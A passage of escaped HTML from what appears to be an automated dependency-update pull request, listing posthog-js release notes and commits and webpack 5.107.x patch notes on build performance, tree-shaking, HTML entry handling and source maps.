href=\"https://redirect.github.com/PostHog/posthog-js/pull/3641\"\u003e#3641\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/2e1d5f4081c98a04e6a16f57e42491911453994d\"\u003e\u003ccode\u003e2e1d5f4\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dustinbyrne\"\u003e\u003ccode\u003e@​dustinbyrne\u003c/code\u003e\u003c/a\u003e! - Add \u003ccode\u003eflag_keys\u003c/code\u003e config to restrict browser feature flag remote evaluation to specific flag keys.\n(2026-05-21)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/PostHog/posthog-js/commit/2e1d5f4081c98a04e6a16f57e42491911453994d\"\u003e\u003ccode\u003e2e1d5f4\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/types\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.375.0\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/core\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.29.8\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eposthog-js@1.374.4\u003c/h2\u003e\n\u003ch2\u003e1.374.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3638\"\u003e#3638\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/87e2145b5d09ed8a24df1fc337dad5c3c90c1b8a\"\u003e\u003ccode\u003e87e2145\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/marandaneto\"\u003e\u003ccode\u003e@​marandaneto\u003c/code\u003e\u003c/a\u003e! - Apply tracing headers to matching XMLHttpRequest requests\n(2026-05-21)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3646\"\u003e#3646\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/4f87827dda9c102a6deded986f2afd9fdddfb2e5\"\u003e\u003ccode\u003e4f87827\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/marandaneto\"\u003e\u003ccode\u003e@​marandaneto\u003c/code\u003e\u003c/a\u003e! - Avoid throwing or initializing PostHogProvider when no API key or client is provided\n(2026-05-21)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3645\"\u003e#3645\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/280832b50b4c058e010436c4aab861cb143577c1\"\u003e\u003ccode\u003e280832b\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/TueHaulund\"\u003e\u003ccode\u003e@​TueHaulund\u003c/code\u003e\u003c/a\u003e! - Capture \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot;\u0026gt;\u003c/code\u003e URLs from \u003ccode\u003elink.sheet.href\u003c/code\u003e and try \u003ccode\u003elink.sheet\u003c/code\u003e directly for inlining, so recordings survive SPA \u003ccode\u003ehistory.pushState\u003c/code\u003e navigations between routes of different path depths (where \u003ccode\u003elink.href\u003c/code\u003e re-resolves against a new baseURI but \u003ccode\u003elink.sheet.href\u003c/code\u003e preserves the URL the browser actually fetched).\u003c/p\u003e\n\u003cp\u003eShips the fix landed in \u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3635\"\u003e#3635\u003c/a\u003e, which only bumped the internal \u003ccode\u003e@posthog/rrweb-snapshot\u003c/code\u003e package — that package is bundled into \u003ccode\u003eposthog-js\u003c/code\u003e at build time but is not published to npm on its own, so a \u003ccode\u003eposthog-js\u003c/code\u003e bump is needed to actually deliver the change. (2026-05-21)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies []:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/types\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.374.4\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/core\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.29.7\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eposthog-js@1.374.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/3d41c1d9dd4cecd928e5ec5b37ec16256bc95352\"\u003e\u003ccode\u003e3d41c1d\u003c/code\u003e\u003c/a\u003e chore: update versions and lockfile [version bump]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/c806ccafdcc39b38e9554f8a17a8c2fbd3361dda\"\u003e\u003ccode\u003ec806cca\u003c/code\u003e\u003c/a\u003e feat: use async gzip for replay event compression (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3639\"\u003e#3639\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/6e8d3495d0a29076aeea5220e19e646aeb7f063f\"\u003e\u003ccode\u003e6e8d349\u003c/code\u003e\u003c/a\u003e feat(replay): expose rrweb subpath entries on posthog-js (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3655\"\u003e#3655\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/ec81cc61a11dac7dd79335b62f5be1a5ffa3ed77\"\u003e\u003ccode\u003eec81cc6\u003c/code\u003e\u003c/a\u003e chore: validate changeset versioning (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3647\"\u003e#3647\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/6d3d39fac541a8e5233fac7c905cd4101641ea0a\"\u003e\u003ccode\u003e6d3d39f\u003c/code\u003e\u003c/a\u003e chore(ci): bump pinned posthog-sdk-test-harness SHA (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3660\"\u003e#3660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/b191176faac3a17d9feda46c05436e989bd0d1fc\"\u003e\u003ccode\u003eb191176\u003c/code\u003e\u003c/a\u003e chore(ci): bump pinned PostHog/.github reusable workflow SHA (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3659\"\u003e#3659\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/fb18a0ad5ab8cdf8ab3331a385f0d1f0ba863eaf\"\u003e\u003ccode\u003efb18a0a\u003c/code\u003e\u003c/a\u003e chore: pin github actions to sha (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3644\"\u003e#3644\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/a05405d0ec67988715cb31634730f95729f3f27d\"\u003e\u003ccode\u003ea05405d\u003c/code\u003e\u003c/a\u003e chore: update versions and lockfile [version bump]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/18ea8b53f608607075c93bc18b29be8dfd41eb3f\"\u003e\u003ccode\u003e18ea8b5\u003c/code\u003e\u003c/a\u003e feat(node): promote flag definition cache provider types (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3642\"\u003e#3642\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/2e1d5f4081c98a04e6a16f57e42491911453994d\"\u003e\u003ccode\u003e2e1d5f4\u003c/code\u003e\u003c/a\u003e feat: add browser flag_keys config (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3641\"\u003e#3641\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/PostHog/posthog-js/compare/posthog-js@1.369.3...posthog-js@1.376.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack` from 5.105.4 to 5.107.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.107.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eReduce per-file overhead in \u003ccode\u003eContextModuleFactory.resolveDependencies\u003c/code\u003e by batching \u003ccode\u003ealternativeRequests\u003c/code\u003e hook calls. Previously the hook was invoked once per file in the context (with a single-item array), paying per-call overhead (closure allocation, \u003ccode\u003eresolverFactory.get\u003c/code\u003e, intermediate arrays in \u003ccode\u003eRequireContextPlugin\u003c/code\u003e) for every file. The hook is now invoked once per directory with all matched files in one batch — \u003ccode\u003eRequireContextPlugin\u003c/code\u003e's tap already iterates the items array, so the output is unchanged. Steady-state rebuild on a 4000-file \u003ccode\u003erequire.context\u003c/code\u003e drops a further ~15 ms (after the watch-mode purge fix in the same release). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21020\"\u003e#21020\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eInclude each external info's \u003ccode\u003eruntimeCondition\u003c/code\u003e in \u003ccode\u003eConcatenatedModule#updateHash\u003c/code\u003e so changes to a concatenated external's runtime condition invalidate persistent caches instead of slipping through with the module id alone. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21023\"\u003e#21023\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix HTML \u003ccode\u003e[contenthash]\u003c/code\u003e for referenced asset and inline-style URL changes. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21018\"\u003e#21018\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eResolve chunk-hash placeholders in chunk URLs embedded into extracted HTML. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21018\"\u003e#21018\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRemove unnecessary \u003ccode\u003e__webpack_require__\u003c/code\u003e runtime helpers in ESM library output with multi-module chunks. (by \u003ca href=\"https://github.com/xiaoxiaojx\"\u003e\u003ccode\u003e@​xiaoxiaojx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21032\"\u003e#21032\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRewrite \u003ccode\u003eNormalModule#getSideEffectsConnectionState\u003c/code\u003e walk as an allocation-light iterative loop instead of a generator trampoline, restoring rebuild performance lost in \u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20993\"\u003e#20993\u003c/a\u003e while keeping deep import chains stack-safe. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21014\"\u003e#21014\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix runtime \u003ccode\u003eReferenceError\u003c/code\u003e on the first activation of a lazy-compiled module when \u003ccode\u003eoutput.library.type\u003c/code\u003e produces a closure-wrapped bundle (\u003ccode\u003eumd\u003c/code\u003e, \u003ccode\u003eumd2\u003c/code\u003e, \u003ccode\u003eamd\u003c/code\u003e, \u003ccode\u003eamd-require\u003c/code\u003e, \u003ccode\u003esystem\u003c/code\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21013\"\u003e#21013\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eExternal modules of these types reference closure-bound identifiers like \u003ccode\u003e__WEBPACK_EXTERNAL_MODULE_react__\u003c/code\u003e, supplied by the library wrapper that is generated once per chunk. When \u003ccode\u003elazyCompilation\u003c/code\u003e activates an entry or import for the first time, any external dependency the lazily-built module pulls in arrives in a hot-update chunk that lives outside the original wrapper closure, so its factory body cannot resolve the closure identifier and only a manual page refresh recovers.\u003c/p\u003e\n\u003cp\u003eThe inactive \u003ccode\u003eLazyCompilationProxyModule\u003c/code\u003e now declares statically-enumerable externals (string and object forms of \u003ccode\u003eexternals\u003c/code\u003e) as its own dependencies, so the initial entry chunk's library wrapper already exposes their closure identifiers. When activation later pulls in those externals through the lazily-compiled module, they resolve to the already-installed factories instead of throwing. Function and RegExp externals are not pre-populated because their effective request set isn't knowable up front.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFill in missing \u003ccode\u003eentryOptions\u003c/code\u003e when an async block joins an existing entrypoint. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21026\"\u003e#21026\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRelease per-child \u003ccode\u003ecodeGenerationResults\u003c/code\u003e in \u003ccode\u003eMultiCompiler\u003c/code\u003e and at \u003ccode\u003eCompiler.close\u003c/code\u003e to reduce memory retention. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21015\"\u003e#21015\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eReduce peak memory of \u003ccode\u003eSourceMapDevToolPlugin\u003c/code\u003e on large builds (closes \u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20961\"\u003e#20961\u003c/a\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20963\"\u003e#20963\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix slow \u003ccode\u003erequire.context()\u003c/code\u003e / dynamic \u003ccode\u003eimport()\u003c/code\u003e rebuilds in watch mode (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/13636\"\u003e#13636\u003c/a\u003e). When a file inside a watched context directory changed, \u003ccode\u003eNodeWatchFileSystem\u003c/code\u003e would call \u003ccode\u003einputFileSystem.purge(contextDir)\u003c/code\u003e. The enhanced-resolve \u003ccode\u003epurge\u003c/code\u003e implementation matches cache keys with \u003ccode\u003ekey.startsWith(contextDir)\u003c/code\u003e, so the stat cache of every file under the directory was discarded on every rebuild — \u003ccode\u003eContextModuleFactory.resolveDependencies\u003c/code\u003e then re-\u003ccode\u003estat\u003c/code\u003e-ed the whole tree on each rebuild. Single-file rebuilds on a 4000-file context now reuse the warm stat cache, dropping median rebuild from ~1260 ms to ~650 ms in a local reproduction (≈49%). For directory items that are explicitly watched contexts, \u003ccode\u003epurge\u003c/code\u003e is now called with \u003ccode\u003e{ exact: true }\u003c/code\u003e (added in \u003ccode\u003eenhanced-resolve@5.22.0\u003c/code\u003e) so only the directory's own entry is invalidated; file-level changes in the same aggregated event continue to purge file stats and the parent \u003ccode\u003ereaddir\u003c/code\u003e as before. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21020\"\u003e#21020\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.107.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAlign the experimental HTML tokenizer with the WHATWG spec: fix offset-range bugs in the script-data, content-mode end-tag, attribute-value, and EOF states; surface tokenizer parse errors to consumers via a new \u003ccode\u003eparseError\u003c/code\u003e callback (\u003ccode\u003e\u0026quot;warning\u0026quot;\u003c/code\u003e when the tokenizer recovers and the emitted token is still well-formed, \u003ccode\u003e\u0026quot;error\u0026quot;\u003c/code\u003e when the offset range is incomplete — e.g. \u003ccode\u003eeof-in-tag\u003c/code\u003e); and add the full WHATWG named character references table so \u003ccode\u003edecodeHtmlEntities\u003c/code\u003e handles all named entities (including legacy bare forms like \u003ccode\u003e\u0026amp;AMP\u003c/code\u003e and multi-code-point entities like \u003ccode\u003e\u0026amp;NotEqualTilde;\u003c/code\u003e) with proper longest-prefix backtracking. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21000\"\u003e#21000\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eTree-shake CommonJS modules imported through a \u003ccode\u003econst NAME = require(LITERAL)\u003c/code\u003e binding when only static members of \u003ccode\u003eNAME\u003c/code\u003e are read. Previously webpack treated every export of such modules as referenced (because the bare \u003ccode\u003erequire()\u003c/code\u003e dependency reports \u003ccode\u003eEXPORTS_OBJECT_REFERENCED\u003c/code\u003e), so unused \u003ccode\u003eexports.x = ...\u003c/code\u003e assignments remained in the bundle even with \u003ccode\u003eusedExports\u003c/code\u003e enabled. The parser now forwards \u003ccode\u003eNAME.x\u003c/code\u003e / \u003ccode\u003eNAME.x()\u003c/code\u003e / \u003ccode\u003eNAME[\u0026quot;x\u0026quot;]\u003c/code\u003e accesses to the underlying \u003ccode\u003eCommonJsRequireDependency\u003c/code\u003e as referenced exports, falling back to the full exports object the moment \u003ccode\u003eNAME\u003c/code\u003e is read in any other context (passed by value, destructured later, accessed with a dynamic key, …). This brings the binding form to parity with the existing destructuring form (\u003ccode\u003econst { x } = require(...)\u003c/code\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21003\"\u003e#21003\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003eRangeError: Maximum call stack size exceeded\u003c/code\u003e thrown from \u003ccode\u003eHarmonyImportSideEffectDependency.getModuleEvaluationSideEffectsState\u003c/code\u003e on long linear chains of side-effect-free imports. \u003ccode\u003eNormalModule.getSideEffectsConnectionState\u003c/code\u003e previously descended through \u003ccode\u003eHarmonyImportSideEffectDependency.getModuleEvaluationSideEffectsState\u003c/code\u003e recursively, adding two stack frames per module, which overflowed V8's stack at a few thousand modules deep. The traversal is now iterative. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20993\"\u003e#20993\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003eNormalModuleFactory\u003c/code\u003e parser/generator types: (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20999\"\u003e#20999\u003c/a\u003e)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emodule.generator.html\u003c/code\u003e now uses \u003ccode\u003eHtmlGeneratorOptions\u003c/code\u003e instead of \u003ccode\u003eEmptyGeneratorOptions\u003c/code\u003e (the \u003ccode\u003eextract\u003c/code\u003e option was hidden from the \u003ccode\u003ecreateGenerator\u003c/code\u003e / \u003ccode\u003egenerator\u003c/code\u003e hook types).\u003c/li\u003e\n\u003cli\u003eWebAssembly (\u003ccode\u003ewebassembly/async\u003c/code\u003e, \u003ccode\u003ewebassembly/sync\u003c/code\u003e) generator hooks now use \u003ccode\u003eEmptyGeneratorOptions\u003c/code\u003e instead of \u003ccode\u003eEmptyParserOptions\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNormalModuleFactory#getParser\u003c/code\u003e / \u003ccode\u003ecreateParser\u003c/code\u003e / \u003ccode\u003egetGenerator\u003c/code\u003e / \u003ccode\u003ecreateGenerator\u003c/code\u003e are now generic over the module-type string, returning the specific parser/generator class for known types (e.g. \u003ccode\u003eJavascriptParser\u003c/code\u003e for \u003ccode\u003e\u0026quot;javascript/auto\u0026quot;\u003c/code\u003e, \u003ccode\u003eCssGenerator\u003c/code\u003e for \u003ccode\u003e\u0026quot;css\u0026quot;\u003c/code\u003e, etc.) instead of always returning the base \u003ccode\u003eParser\u003c/code\u003e / \u003ccode\u003eGenerator\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNormalModuleCreateData\u003c/code\u003e is now generic over the module type so \u003ccode\u003eparser\u003c/code\u003e, \u003ccode\u003eparserOptions\u003c/code\u003e, \u003ccode\u003egenerator\u003c/code\u003e, and \u003ccode\u003egeneratorOptions\u003c/code\u003e are narrowed to the specific class / options for the given \u003ccode\u003etype\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eLink import bindings used inside \u003ccode\u003edefine(...)\u003c/code\u003e callbacks in ES modules. Previously, \u003ccode\u003eHarmonyDetectionParserPlugin\u003c/code\u003e skipped walking the arguments of \u003ccode\u003edefine\u003c/code\u003e calls in harmony modules, so references to imported bindings inside an inline AMD \u003ccode\u003edefine\u003c/code\u003e factory (e.g. \u003ccode\u003edefine(function () { console.log(foo); })\u003c/code\u003e) were not rewritten to their imported references and could cause \u003ccode\u003eReferenceError\u003c/code\u003e at runtime. Inner graph usage analysis is also fixed for the related pattern \u003ccode\u003econst fn = function () { foo; }; define(fn);\u003c/code\u003e. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20990\"\u003e#20990\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eHTML-entry pipeline (\u003ccode\u003eexperiments.html\u003c/code\u003e + \u003ccode\u003eexperiments.css\u003c/code\u003e): emit \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot;\u0026gt;\u003c/code\u003e tags for CSS chunks reachable from a \u003ccode\u003e\u0026lt;script src\u0026gt;\u003c/code\u003e entry. Previously when the bundled JS imported CSS, the resulting \u003ccode\u003e.css\u003c/code\u003e file was emitted to disk but never referenced from the extracted HTML (no \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e tag), and when \u003ccode\u003esplitChunks\u003c/code\u003e extracted CSS into sibling chunks the HTML cloned the originating \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e for each one — producing \u003ccode\u003e\u0026lt;script src=\u0026quot;style.js\u0026quot;\u0026gt;\u003c/code\u003e pointing at non-existent JS filenames instead of \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot; href=\u0026quot;style.css\u0026quot;\u0026gt;\u003c/code\u003e. CSS chunks are now sorted by the entrypoint's module post-order index so the \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e tags also appear in source import order, fixing the cascade ordering issue documented in \u003ccode\u003ehtml-webpack-plugin#1838\u003c/code\u003e and \u003ccode\u003ewebpack/mini-css-extract-plugin#959\u003c/code\u003e for HTML-entry builds. \u003ccode\u003enonce\u003c/code\u003e/\u003ccode\u003ecrossorigin\u003c/code\u003e/\u003ccode\u003ereferrerpolicy\u003c/code\u003e are copied from the originating tag onto the emitted \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21002\"\u003e#21002\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAllow \u003ccode\u003edevtool\u003c/code\u003e and \u003ccode\u003eSourceMapDevToolPlugin\u003c/code\u003e (or multiple \u003ccode\u003eSourceMapDevToolPlugin\u003c/code\u003e instances) to coexist on the same asset. Previously the second instance would silently skip any asset whose \u003ccode\u003einfo.related.sourceMap\u003c/code\u003e had already been set by an earlier instance, and even when it ran the asset had been rewrapped as a \u003ccode\u003eRawSource\u003c/code\u003e so no source map could be recovered — producing an empty \u003ccode\u003e.map\u003c/code\u003e file. The plugin now keeps a per-compilation stash of pristine source maps, namespaces its persistent cache entries by the options that affect output, and appends additional \u003ccode\u003erelated.sourceMap\u003c/code\u003e entries instead of overwriting them. The classic workaround of pairing \u003ccode\u003edevtool: 'hidden-source-map'\u003c/code\u003e with a \u003ccode\u003enew webpack.SourceMapDevToolPlugin({ filename: '[file].secondary.map', noSources: true })\u003c/code\u003e now produces both maps in a single build. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21001\"\u003e#21001\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.107.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eReduce per-file overhead in \u003ccode\u003eContextModuleFactory.resolveDependencies\u003c/code\u003e by batching \u003ccode\u003ealternativeRequests\u003c/code\u003e hook calls. Previously the hook was invoked once per file in the context (with a single-item array), paying per-call overhead (closure allocation, \u003ccode\u003eresolverFactory.get\u003c/code\u003e, intermediate arrays in \u003ccode\u003eRequireContextPlugin\u003c/code\u003e) for every file. The hook is now invoked once per directory with all matched files in one batch — \u003ccode\u003eRequireContextPlugin\u003c/code\u003e's tap already iterates the items array, so the output is unchanged. Steady-state rebuild on a 4000-file \u003ccode\u003erequire.context\u003c/code\u003e drops a further ~15 ms (after the watch-mode purge fix in the same release). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21020\"\u003e#21020\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eInclude each external info's \u003ccode\u003eruntimeCondition\u003c/code\u003e in \u003ccode\u003eConcatenatedModule#updateHash\u003c/code\u003e so changes to a concatenated external's runtime condition invalidate persistent caches instead of slipping through with the module id alone. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21023\"\u003e#21023\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix HTML \u003ccode\u003e[contenthash]\u003c/code\u003e for referenced asset and inline-style URL changes. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca 